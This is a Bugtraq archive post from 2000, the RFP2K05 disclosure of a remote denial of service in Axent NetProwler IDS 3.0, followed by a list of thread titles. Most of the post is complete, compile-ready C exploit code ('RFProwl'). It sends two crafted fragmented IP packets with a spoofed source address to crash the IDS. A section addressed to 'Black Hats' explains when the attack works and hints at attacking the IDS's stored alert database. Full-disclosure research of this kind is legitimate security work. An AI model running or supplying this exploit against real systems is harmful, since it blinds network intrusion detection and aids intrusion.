Bugtraq mailing list archives
RFP2K05: NetProwler vs. RFProwler
From: rfp () WIRETRIP NET (rain forest puppy)
Date: Fri, 19 May 2000 13:05:32 -0500
---/ RFP2K05 /----------------------------/ rfp.labs / wiretrip /--------- NetProwler vs. RFProwler Remote denial of service in Axent NetProwler ------------------------------------/ rain forest puppy / rfp () wiretrip net Table of contents: -/ 1 / For the Black Hats -/ 2 / For the White Hats -/ 3 / OMG! Look! It's not Perl! --/ 1 / For the Black Hats /---------------------------------------------- The attached demonstration dribbles two fragmented IP packets to an IP address which is profiled by NetProwler IDS version 3.0. The result is that NetProwler chokes, dropping into a lovely Dr. Watson error message. Note that this was tested with an older version (3.0), since Axent hasn't sent me an evaluation key (I requested it over 11 days ago) for the latest version downloadable from the web. Also note that NetProwler needs to be profiling the FTP service on the victim for this to be effective. This was found using Dug Song/Anzen's awesome Fragrouter program. http://www.anzen.com/research/nidsbench/ Also, NetProwler stores incoming alert information in a Jet .mdb. I suggest you take a look at RFP2K04, and consider the implications. ;) --/ 2 / For the White Hats /---------------------------------------------- As I mentioned above, this is for version 3.0. Axent was contacted on Monday, but they never responded. So after a small 'industry-standard' wait, I have chosen to release this. --/ 3 / OMG! Look! It's not Perl! /--------------------------------------- /* RFProwl.c - rain forest puppy / wiretrip / rfp () wiretrip net Kills NetProwler IDS version 3.0 You need libnet installed. It's available from www.packetfactory.net. Acks to route. Only tested on RH 6.x Linux. To compile: gcc RFProwl.c -lnet -o RFProwl Plus, make sure your architecture is defined below: */ #define LIBNET_LIL_ENDIAN 1 #undef LIBNET_BIG_ENDIAN 1 #include <libnet.h> /* it's just much easier to code in the packet frags we want. :) */ char pack1[]="\x45\x00" "\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09" "\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02" "\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; char pack2[]="\x45\x00" "\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09" "\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02" "\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00"; int main(int argc, char **argv) { int sock, c; u_long src_ip, dst_ip; printf("RFProwl - rain forest puppy / wiretrip\n"); if(argc<3){ printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n"); exit(EXIT_FAILURE);} dst_ip=inet_addr(argv[1]); src_ip=inet_addr(argv[2]); memcpy(pack1+16,&dst_ip,4); memcpy(pack2+16,&dst_ip,4); memcpy(pack1+12,&src_ip,4); memcpy(pack1+12,&src_ip,4); sock = open_raw_sock(IPPROTO_RAW); if (sock == -1){ perror("Socket problems: "); exit(EXIT_FAILURE);} c = write_ip(sock, pack1, 46); if (c < 46) printf("Write_ip #1 choked\n"); c = write_ip(sock, pack2, 46); if (c < 46) printf("Write_ip #2 choked\n"); printf("Packets sent\n"); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);} ----/ acks /-------------------------------------------------------------- eEye, Attrition, w00w00, ADM, Technotronic, USSR, Packetfactory.net ------------------------------------/ rain forest puppy / rfp () wiretrip net Since when has TUCOWS become a TLD registrar?!? ---/ RFP2K05 /----------------------------/ rfp.labs / wiretrip /---------
Current thread:
- RFP2K04: Mining BlackICE with RFPickAxe, (continued)
- RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 17)
- FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx [REVISED] FreeBSD Security Officer (May 17)
- klogin remote exploit duke (May 17)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Robert Graham (May 17)
- antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Sebastian (May 18)
- Re: antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Mudge (May 18)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Matt (May 18)
- AUX Security Advisory on Be/OS 5.0 (DoS) visi0n (May 17)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Andrew Lambeth (May 19)
- Remote Dos attack against Intel express 8100 router Dimuthu Parussalla (May 18)
- RFP2K05: NetProwler vs. RFProwler rain forest puppy (May 19)
- Key Generation Security Flaw in PGP 5.0 gec () ACM ORG (May 23)
- Filesystem vulnerability in AIX salme () US IBM COM (May 23)
- Re: RFP2K05: NetProwler vs. RFProwler Pedro Quintanilha (May 23)
- Security Vulnerability in Qpopper 2.53 (Upgrade to 3.0.2) Qpopper Support (May 23)
- Remote xploit for MDBMS |[TDP]| (May 24)
- HP Web JetAdmin Version 6.0 Remote DoS attack Vulnerability Ussr Labs (May 24)
- Re: RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 19)
- revised patches for kerberos vulnerability Tom Yu (May 19)
- Microsoft Security Bulletin (MS00-029) Microsoft Product Security (May 19)
- BindView Security Advisory: jolt2 - Remote DoS against NT, W2K, 9x BindView Security Advisory (May 19)